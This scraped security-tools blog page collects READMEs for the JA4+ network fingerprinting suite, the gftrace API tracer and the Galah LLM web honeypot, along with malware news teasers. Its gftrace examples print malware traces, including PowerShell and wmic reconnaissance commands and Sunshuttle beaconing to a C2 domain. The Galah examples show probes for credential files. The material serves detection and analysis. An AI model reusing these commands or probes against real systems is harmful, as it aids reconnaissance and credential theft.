
JA4+ - Suite Of Network Fingerprinting Standards

By: Zion3R


JA4+ is a suite of network fingerprinting methods that are easy to use and easy to share. These methods are both human and machine readable to facilitate more effective threat-hunting and analysis. The use-cases for these fingerprints include scanning for threat actors, malware detection, session hijacking prevention, compliance automation, location tracking, DDoS detection, grouping of threat actors, reverse shell detection, and many more.

Please read our blogs for details on how JA4+ works, why it works, and examples of what can be detected/prevented with it:
JA4+ Network Fingerprinting (JA4/S/H/L/X/SSH)
JA4T: TCP Fingerprinting (JA4T/TS/TScan)


To understand how to read JA4+ fingerprints, see Technical Details

This repo includes JA4+ implementations in Python, Rust, Zeek, and C, as well as a Wireshark plugin.

JA4/JA4+ support is being added to:
GreyNoise
Hunt
Driftnet
DarkSail
Arkime
GoLang (JA4X)
Suricata
Wireshark
Zeek
nzyme
Netresec's CapLoader
NetworkMiner">Netresec's NetworkMiner
NGINX
F5 BIG-IP
nfdump
ntop's ntopng
ntop's nDPI
Team Cymru
NetQuest
Censys
Exploit.org's Netryx
Cloudflare
Fastly
with more to be announced...

Examples

Application JA4+ Fingerprints
Chrome JA4=t13d1516h2_8daaf6152771_02713d6af862 (TCP)
JA4=q13d0312h3_55b375c5d22e_06cda9e17597 (QUIC)
JA4=t13d1517h2_8daaf6152771_b0da82dd1658 (pre-shared key)
JA4=t13d1517h2_8daaf6152771_b1ff8ab2d16f (no key)
IcedID Malware Dropper JA4H=ge11cn020000_9ed1ff1f7b03_cd8dafe26982
IcedID Malware JA4=t13d201100_2b729b4bf6f3_9e7b989ebec8
JA4S=t120300_c030_5e2616a54c73
Sliver Malware JA4=t13d190900_9dc949149365_97f8aa674fd9
JA4S=t130200_1301_a56c5b993250
JA4X=000000000000_4f24da86fad6_bf0f0589fc03
JA4X=000000000000_7c32fa18c13e_bf0f0589fc03
Cobalt Strike JA4H=ge11cn060000_4e59edc1297a_4da5efaf0cbd
JA4X=2166164053c1_2166164053c1_30d204a01551
SoftEther VPN JA4=t13d880900_fcb5b95cb75a_b0d3b4ac2a14 (client)
JA4S=t130200_1302_a56c5b993250
JA4X=d55f458d5a6c_d55f458d5a6c_0fc8c171b6ae
Qakbot JA4X=2bab15409345_af684594efb4_000000000000
Pikabot JA4X=1a59268f55e5_1a59268f55e5_795797892f9c
Darkgate JA4H=po10nn060000_cdb958d032b0
LummaC2 JA4H=po11nn050000_d253db9d024b
Evilginx JA4=t13d191000_9dc949149365_e7c285222651
Reverse SSH Shell JA4SSH=c76s76_c71s59_c0s70
Windows 10 JA4T=64240_2-1-3-1-1-4_1460_8
Epson Printer JA4TScan=28960_2-4-8-1-3_1460_3_1-4-8-16

For more, see ja4plus-mapping.csv
The mapping file is unlicensed and free to use. Feel free to do a pull request with any JA4+ data you find.

Plugins

Wireshark
Zeek
Arkime

Binaries

tshark version 4.0.6 or later is recommended for full functionality. See: https://pkgs.org/search/?q=tshark

Download the latest JA4 binaries from: Releases.

JA4+ on Ubuntu

sudo apt install tshark
./ja4 [options] [pcap]

JA4+ on Mac

1) Install Wireshark (https://www.wireshark.org/download.html), which will install tshark
2) Add tshark to $PATH

ln -s /Applications/Wireshark.app/Contents/MacOS/tshark /usr/local/bin/tshark
./ja4 [options] [pcap]

JA4+ on Windows

1) Install Wireshark for Windows from https://www.wireshark.org/download.html, which will install tshark.exe
tshark.exe is located where Wireshark is installed, for example: C:\Program Files\Wireshark\tshark.exe
2) Add the location of tshark to your "PATH" environment variable in Windows.
(System properties > Environment Variables... > Edit Path)
3) Open cmd and navigate to the ja4 folder

ja4 [options] [pcap]

Database

An official JA4+ database of fingerprints, associated applications and recommended detection logic is in the process of being built.

In the meantime, see ja4plus-mapping.csv

Feel free to do a pull request with any JA4+ data you find.

JA4+ Details

JA4+ is a set of simple yet powerful network fingerprints for multiple protocols that are both human and machine readable, facilitating improved threat-hunting and security analysis. If you are unfamiliar with network fingerprinting, I encourage you to read my blogs releasing JA3 here, JARM here, and this excellent blog by Fastly on the State of TLS Fingerprinting which outlines the history of the aforementioned along with their problems. JA4+ brings dedicated support, keeping the methods up-to-date as the industry changes.

All JA4+ fingerprints have an a_b_c format, delimiting the different sections that make up the fingerprint. This allows for hunting and detection utilizing just ab or ac or c only. If one wanted to just do analysis on incoming cookies into their app, they would look at JA4H_c only. This new locality-preserving format facilitates deeper and richer analysis while remaining simple, easy to use, and allowing for extensibility.

For example, GreyNoise is an internet listener that identifies internet scanners and is implementing JA4+ into their product. They have an actor who scans the internet with a constantly changing single TLS cipher. This generates a massive amount of completely different JA3 fingerprints, but with JA4, only the b part of the JA4 fingerprint changes; parts a and c remain the same. As such, GreyNoise can track the actor by looking at the JA4_ac fingerprint (joining a+c, dropping b).
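As a rough illustration of how the a_b_c format enables this kind of pivoting, here is a minimal Go sketch (the fingerprint value is the Chrome example listed above; the helper name is hypothetical, not part of the JA4+ reference code):

package main

import (
	"fmt"
	"strings"
)

// ja4Parts splits a JA4-style fingerprint of the form "a_b_c" into its
// three locality-preserving sections.
func ja4Parts(fp string) (a, b, c string) {
	p := strings.SplitN(fp, "_", 3)
	return p[0], p[1], p[2]
}

func main() {
	// Chrome JA4 example from the list above.
	fp := "t13d1516h2_8daaf6152771_02713d6af862"
	a, b, c := ja4Parts(fp)

	// Hunting on a subset of sections: JA4_ac joins a and c and drops b,
	// which stays stable even when an actor rotates the cipher list (b).
	fmt.Println("JA4_a:", a, "JA4_b:", b, "JA4_c:", c)
	fmt.Println("JA4_ac:", a+"_"+c)
}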

Current methods and implementation details:
| Full Name | Short Name | Description |
|---|---|---|
| JA4 | JA4 | TLS Client Fingerprinting |
| JA4Server | JA4S | TLS Server Response / Session Fingerprinting |
| JA4HTTP | JA4H | HTTP Client Fingerprinting |
| JA4Latency | JA4L | Latency Measurement / Light Distance |
| JA4X509 | JA4X | X509 TLS Certificate Fingerprinting |
| JA4SSH | JA4SSH | SSH Traffic Fingerprinting |
| JA4TCP | JA4T | TCP Client Fingerprinting |
| JA4TCPServer | JA4TS | TCP Server Response Fingerprinting |
| JA4TCPScan | JA4TScan | Active TCP Fingerprint Scanner |

The full name or short name can be used interchangeably. Additional JA4+ methods are in the works...

To understand how to read JA4+ fingerprints, see Technical Details

Licensing

JA4: TLS Client Fingerprinting is open-source, BSD 3-Clause, same as JA3. FoxIO does not have patent claims and is not planning to pursue patent coverage for JA4 TLS Client Fingerprinting. This allows any company or tool currently utilizing JA3 to immediately upgrade to JA4 without delay.

JA4S, JA4L, JA4H, JA4X, JA4SSH, JA4T, JA4TScan and all future additions, (collectively referred to as JA4+) are licensed under the FoxIO License 1.1. This license is permissive for most use cases, including for academic and internal business purposes, but is not permissive for monetization. If, for example, a company would like to use JA4+ internally to help secure their own company, that is permitted. If, for example, a vendor would like to sell JA4+ fingerprinting as part of their product offering, they would need to request an OEM license from us.

All JA4+ methods are patent pending.
JA4+ is a trademark of FoxIO

JA4+ can be, and is being, implemented into open-source tools; see the License FAQ for details.

This licensing allows us to provide JA4+ to the world in a way that is open and immediately usable, but also provides us with a way to fund continued support, research into new methods, and the development of the upcoming JA4 Database. We want everyone to have the ability to utilize JA4+ and are happy to work with vendors and open source projects to help make that happen.

ja4plus-mapping.csv is not included in the above software licenses and is thereby a license-free file.

Q&A

Q: Why are you sorting the ciphers? Doesn't the ordering matter?
A: It does, but in our research we've found that applications and libraries choose a unique cipher list more often than a unique ordering. This also reduces the effectiveness of "cipher stunting," a tactic of randomizing cipher ordering to prevent JA3 detection.
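As a minimal sketch of why sorting defeats cipher stunting (hypothetical cipher values, not the full JA4 algorithm): two ClientHellos offering the same ciphers in different orders reduce to the same canonical list.

package main

import (
	"fmt"
	"sort"
	"strings"
)

// canonicalCiphers sorts the offered cipher values so that reordering
// them (cipher stunting) no longer changes the fingerprint input.
func canonicalCiphers(ciphers []string) string {
	s := append([]string(nil), ciphers...) // copy before sorting
	sort.Strings(s)
	return strings.Join(s, ",")
}

func main() {
	helloA := []string{"1301", "1302", "c02b", "c02f"}
	helloB := []string{"c02f", "1301", "c02b", "1302"} // same ciphers, shuffled

	fmt.Println(canonicalCiphers(helloA) == canonicalCiphers(helloB)) // true
}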

Q: Why are you sorting the extensions?
A: Earlier in 2023, Google updated Chromium browsers to randomize their extension ordering. Much like cipher stunting, this was a tactic to prevent JA3 detection and "make the TLS ecosystem more robust to changes." Google was worried server implementers would assume the Chrome fingerprint would never change and end up building logic around it, which would cause issues whenever Google went to update Chrome.

So I want to make this clear: JA4 fingerprints will change as application TLS libraries are updated, about once a year. Do not assume fingerprints will remain constant in an environment where applications are updated. In any case, sorting the extensions gets around this and adding in Signature Algorithms preserves uniqueness.

Q: Doesn't TLS 1.3 make fingerprinting TLS clients harder?
A: No, it makes it easier! Since TLS 1.3, clients have had a much larger set of extensions, and even though TLS 1.3 only supports a few ciphers, browsers and applications still support many more.

JA4+ was created by:

John Althouse, with feedback from:

Josh Atkins
Jeff Atkinson
Joshua Alexander
W.
Joe Martin
Ben Higgins
Andrew Morris
Chris Ueland
Ben Schofield
Matthias Vallentin
Valeriy Vorotyntsev
Timothy Noel
Gary Lipsky
And engineers working at GreyNoise, Hunt, Google, ExtraHop, F5, Driftnet and others.

Contact John Althouse at john@foxio.io for licensing and questions.

Copyright (c) 2024, FoxIO



Malicious Python Package Hides Sliver C2 Framework in Fake Requests Library Logo

Cybersecurity researchers have identified a malicious Python package that purports to be an offshoot of the popular requests library and has been found concealing a Golang-version of the Sliver command-and-control (C2) framework within a PNG image of the project's logo.  The package employing this steganographic trickery is requests-darwin-lite, which has been

North Korean Hackers Deploy New Golang Malware 'Durian' Against Crypto Firms

The North Korean threat actor tracked as Kimsuky has been observed deploying a previously undocumented Golang-based malware dubbed Durian as part of highly-targeted cyber attacks aimed at two South Korean cryptocurrency firms. "Durian boasts comprehensive backdoor functionality, enabling the execution of delivered commands, additional file downloads, and exfiltration of files,"

Gftrace - A Command Line Windows API Tracing Tool For Golang Binaries

By: Zion3R


A command line Windows API tracing tool for Golang binaries.

Note: This tool is a PoC and a work-in-progress prototype, so please treat it as such. Feedback is always welcome!


How does it work?

Although Golang programs contain a lot of nuances in the way they are built and how they behave at runtime, they still need to interact with the OS layer, which means that at some point they have to call functions from the Windows API.

The Go runtime package contains a function called asmstdcall, which acts as a kind of "gateway" used to interact with the Windows API. Since this function is expected to call Windows API functions, we can assume it needs access to information such as the address of the target function and its parameters, and this is where things start to get more interesting.

asmstdcall receives a single parameter, which is a pointer to something similar to the following structure:

struct LIBCALL {
    DWORD_PTR Addr;        // address of the Windows API function to call
    DWORD Argc;            // number of arguments
    DWORD_PTR Argv;        // pointer to the argument list
    DWORD_PTR ReturnValue; // filled in after the API call returns

    [...]
}

Some of these fields are filled in after the API function is called (like the return value), while others are received by asmstdcall (like the function address, the number of arguments, and the list of arguments). Regardless of when they are set, it's clear that asmstdcall handles a lot of interesting information about the execution of programs compiled in Golang.

gftrace leverages asmstdcall and the way it works to monitor specific fields of the struct above and log them for the user. The tool is capable of logging the function name, its parameters, and the return value of each Windows function called by a Golang application, all without needing to hook a single API function or have a signature for it.

The tool also tries to ignore all the noise from the Go runtime initialization and to log only the functions called after it (i.e. functions from the main package).

If you want to know more about this project and research check the blogpost.

Installation

Download the latest release.

Usage

  1. Make sure gftrace.exe, gftrace.dll and gftrace.cfg are in the same directory.
  2. Specify which API functions you want to trace in the gftrace.cfg file (the tool does not work without API filters applied).
  3. Run gftrace.exe passing the target Golang program path as a parameter.
gftrace.exe <filepath> <params>

Configuration

All you need to do is specify which functions you want to trace in the gftrace.cfg file, separated by commas with no spaces:

CreateFileW,ReadFile,CreateProcessW

The exact Windows API functions that a Golang method X of package Y would call in a specific scenario can only be determined by analyzing the method itself or by guessing. There are some interesting characteristics that can help with this: for example, Golang applications seem to always prefer functions from the "Wide" and "Ex" sets (e.g. CreateFileW, CreateProcessW, GetComputerNameExW, etc.), so you can take that into account during your analysis.

The default config file contains multiple functions that I have already tested (at least most of them) and that I can say for sure can be called by a Golang application at some point. I'll try to update it eventually.

Examples

Tracing CreateFileW() and ReadFile() in a simple Golang file that calls "os.ReadFile" twice:

- CreateFileW("C:\Users\user\Desktop\doc.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108000, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
- CreateFileW("C:\Users\user\Desktop\doc2.txt", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0x168 (360)
- ReadFile(0x168, 0xc000108200, 0x200, 0xc000075d64, 0x0) = 0x1 (1)
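For reference, a Go program along these lines (file names are hypothetical, chosen to match the trace above) would produce a similar trace, since on Windows os.ReadFile opens the file with CreateFileW and then reads it with ReadFile under the hood:

package main

import (
	"fmt"
	"os"
)

func main() {
	// Each os.ReadFile call results in a CreateFileW followed by ReadFile
	// on Windows, which is what gftrace logs in the example above.
	for _, path := range []string{
		`C:\Users\user\Desktop\doc.txt`,
		`C:\Users\user\Desktop\doc2.txt`,
	} {
		data, err := os.ReadFile(path)
		if err != nil {
			fmt.Println("read error:", err)
			continue
		}
		fmt.Printf("%s: %d bytes\n", path, len(data))
	}
}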

Tracing CreateProcessW() in the TunnelFish malware:

- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress |  ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000ace98, 0xc0000acd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ec8, 0xc0000c4d98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddres s | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc00005eec8, 0xc00005ed98) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell /c "Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn; Get-Recipient | Select Name -ExpandProperty EmailAddresses -first 1 | Select SmtpAddress | ft -hidetableheaders"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bce98, 0xc0000bcd68) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000c4ef0, 0xc0000c4dc0) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000acec0, 0xc0000acd90) = 0x1 (1)
- CreateProcessW("C:\WINDOWS\system32\cmd.exe", "cmd /c "wmic computersystem get domain"", 0x0, 0x0, 0x1, 0x80400, "=C:=C:\Users\user\Desktop", 0x0, 0xc0000bcec0, 0xc0000bcd90) = 0x1 (1)

[...]

Tracing multiple functions in the Sunshuttle malware:

- CreateFileW("config.dat.tmp", 0x80000000, 0x3, 0x0, 0x3, 0x1, 0x0) = 0xffffffffffffffff (-1)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x2, 0x80, 0x0) = 0x198 (408)
- CreateFileW("config.dat.tmp", 0xc0000000, 0x3, 0x0, 0x3, 0x80, 0x0) = 0x1a4 (420)
- WriteFile(0x1a4, 0xc000112780, 0xeb, 0xc0000c79d4, 0x0) = 0x1 (1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x1f0 (496)
- WSASend(0x1f0, 0xc00004f038, 0x1, 0xc00004f020, 0x0, 0xc00004eff0, 0x0) = 0x0 (0)
- WSARecv(0x1f0, 0xc00004ef60, 0x1, 0xc00004ef48, 0xc00004efd0, 0xc00004ef18, 0x0) = 0xffffffff (-1)
- GetAddrInfoW("reyweb.com", 0x0, 0xc000031f18, 0xc000031e88) = 0x0 (0)
- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x200 (512)
- WSASend(0x200, 0xc00004f2b8, 0x1, 0xc00004f2a0, 0x0, 0xc00004f270, 0x0) = 0x0 (0)
- WSARecv(0x200, 0xc00004f1e0, 0x1, 0xc00004f1c8, 0xc00004f250, 0xc00004f198, 0x0) = 0xffffffff (-1)

[...]

Tracing multiple functions in the DeimosC2 framework agent:

- WSASocketW(0x2, 0x1, 0x0, 0x0, 0x0, 0x81) = 0x130 (304)
- setsockopt(0x130, 0xffff, 0x20, 0xc0000b7838, 0x4) = 0xffffffff (-1)
- socket(0x2, 0x1, 0x6) = 0x138 (312)
- WSAIoctl(0x138, 0xc8000006, 0xaf0870, 0x10, 0xb38730, 0x8, 0xc0000b746c, 0x0, 0x0) = 0x0 (0)
- GetModuleFileNameW(0x0, "C:\Users\user\Desktop\samples\deimos.exe", 0x400) = 0x2f (47)
- GetUserProfileDirectoryW(0x140, "C:\Users\user", 0xc0000b7a08) = 0x1 (1)
- LookupAccountSidw(0x0, 0xc00000e250, "user", 0xc0000b796c, "DESKTOP-TEST", 0xc0000b7970, 0xc0000b79f0) = 0x1 (1)
- NetUserGetInfo("DESKTOP-TEST", "user", 0xa, 0xc0000b7930) = 0x0 (0)
- GetComputerNameExW(0x5, "DESKTOP-TEST", 0xc0000b7b78) = 0x1 (1)
- GetAdaptersAddresses(0x0, 0x10, 0x0, 0xc000120000, 0xc0000b79d0) = 0x0 (0)
- CreateToolhelp32Snapshot(0x2, 0x0) = 0x1b8 (440)
- GetCurrentProcessId() = 0x2584 (9604)
- GetCurrentDirectoryW(0x12c, "C:\Users\user\AppData\Local\Programs\retoolkit\bin") = 0x39 (57)

[...]

Future features:

  • [x] Support inspection of 32-bit files.
  • [x] Add support for files that call functions via the "IAT jmp table" instead of calling the API directly in asmstdcall.
  • [x] Add support for command-line parameters for the target process.
  • [ ] Send the tracing log output to a file by default to make filtering easier. Currently there's no separation between the target program's output and gftrace's output. As an alternative, you can redirect gftrace's output to a file using the command line.

⚠️ Warning

  • The tool inspects the target binary dynamically, which means the file being traced is actually executed. If you're inspecting malware or unknown software, please make sure you do it in a controlled environment.
  • Golang programs can be very noisy depending on the file and/or functions being traced (e.g. VirtualAlloc is always called multiple times by the runtime package, CreateFileW is called multiple times before a call to CreateProcessW, etc.). The tool ignores the Golang runtime initialization noise, but after that it's up to the user to decide which functions are best to filter in each scenario.

License

gftrace is published under the GPL v3 license. Please refer to the file named LICENSE for more information.



Galah - An LLM-powered Web Honeypot Using The OpenAI API

By: Zion3R


TL;DR: Galah (/ɡəˈlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


Description

Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.

The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.
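Judging by the log records in the examples below, the LLM is expected to return a JSON object with Headers and Body fields. A minimal Go sketch of decoding such a response (the struct and field names are inferred from the example output, not taken from Galah's source):

package main

import (
	"encoding/json"
	"fmt"
)

// llmResponse mirrors the JSON shape seen in the example output:
// {"Headers": {"Content-Type": "...", ...}, "Body": "..."}
type llmResponse struct {
	Headers map[string]string `json:"Headers"`
	Body    string            `json:"Body"`
}

func main() {
	raw := `{"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden"}`

	var resp llmResponse
	if err := json.Unmarshal([]byte(raw), &resp); err != nil {
		panic(err)
	}
	fmt.Println(resp.Headers["Server"], "->", resp.Body)
}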

Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

Future Enhancements

  • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

  • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

  • Support for Other LLMs.

Getting Started

  • Ensure you have Go version 1.20+ installed.
  • Create an OpenAI API key from here.
  • If you want to serve over HTTPS, generate TLS certificates.
  • Clone the repo and install the dependencies.
  • Update the config.yaml file.
  • Build and run the Go binary!
% git clone git@github.com:0x4D31/galah.git
% cd galah
% go mod download
% go build
% ./galah -i en0 -v

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
llm-based web honeypot // version 1.0
author: Adel "0x4D31" Karimi

2024/01/01 04:29:10 Starting HTTP server on port 8080
2024/01/01 04:29:10 Starting HTTP server on port 8888
2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
2024/01/01 04:39:27 All servers shut down gracefully.

Example Responses

Here are some example responses:

Example 1

% curl http://localhost:8080/login.php
<!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

JSON log record:

{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

Example 2

% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2

JSON log record:

{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

Okay, that was impressive!

Example 3

Now, let's do some sort of adversarial testing!

% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.

JSON log record:

{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

😑

% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.

JSON log record:

{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

You're a galah, mate!



Hackers Target Middle East Governments with Evasive "CR4T" Backdoor

Government entities in the Middle East have been targeted as part of a previously undocumented campaign to deliver a new backdoor dubbed CR4T. Russian cybersecurity company Kaspersky said it discovered the activity in February 2024, with evidence suggesting that it may have been active since at least a year prior. The campaign has been codenamed

Cybercriminals Targeting Latin America with Sophisticated Phishing Scheme

A new phishing campaign has set its eyes on the Latin American region to deliver malicious payloads to Windows systems. "The phishing email contained a ZIP file attachment that when extracted reveals an HTML file that leads to a malicious file download posing as an invoice," Trustwave SpiderLabs researcher Karla Agregado said. The email message, the company said, originates from an email

Malicious Apps Caught Secretly Turning Android Phones into Proxies for Cybercriminals

Several malicious Android apps that turn mobile devices running the operating system into residential proxies (RESIPs) for other threat actors have been observed on the Google Play Store. The findings come from HUMAN's Satori Threat Intelligence team, which said the cluster of VPN apps came fitted with a Golang library that transformed the user's device into a proxy node without their knowledge.

Malicious Ads Targeting Chinese Users with Fake Notepad++ and VNote Installers

